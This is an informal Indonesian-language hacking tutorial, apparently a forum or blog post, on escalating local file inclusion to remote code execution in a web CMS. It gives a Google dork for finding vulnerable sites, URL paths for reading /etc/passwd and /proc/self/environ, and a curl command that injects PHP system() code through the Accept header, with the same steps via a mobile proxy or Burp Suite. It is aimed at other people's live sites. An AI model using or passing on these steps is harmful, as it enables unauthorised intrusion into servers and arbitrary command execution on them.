Dijudul sudah jelas disini w bagi tutor citraweb local file inclusion to remote code execution. Gatau kenapa w jadi tertarik Ama er ce eh muehehe ok langsung sadja
Dork:
inurl:/cni-content/ (kembangin tros bagi w)
Dorking dlu di google :vroh disini aink sudah dapat web yg vuln
Coba ke /system/ajax/?/etc/passwd (localhost/system/ajax/?/etc/passwd)
Lalu kita ke /system/ajax/?/proc/self/environ (localhost/system/ajax/?/proc/self/environ)
Kita coba dengan Accept ea.
Buka termux lalu ketik
curl -H "Accept: <?php echo system(\"ls -la\"); ?>" http://localhost:8080/system/ajax/?/proc/self/environKlu punya masalah yg sama kek w contoh nya kek gini
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.Tinggal tambahkan --output file.txt
Contoh
curl -H "Accept: <?php echo system(\"ls -la\"); ?>" http://localhost:8080/system/ajax/?/proc/self/environ --output file.txtcat file.txt
Kalian juga bisa mengeksekusinya dengan Sandroproxy atau Burpsuite klu di PC :'v, caranya? Cek gaes.
Langsung aja kunjungin web target lo di Lightning Browser ea, lalu ke Sandroproxy nya gayn
Seperti diatas, w coba masukin command nya di bagian Accept ea ;v
<?php echo system("Command Here"); ?>
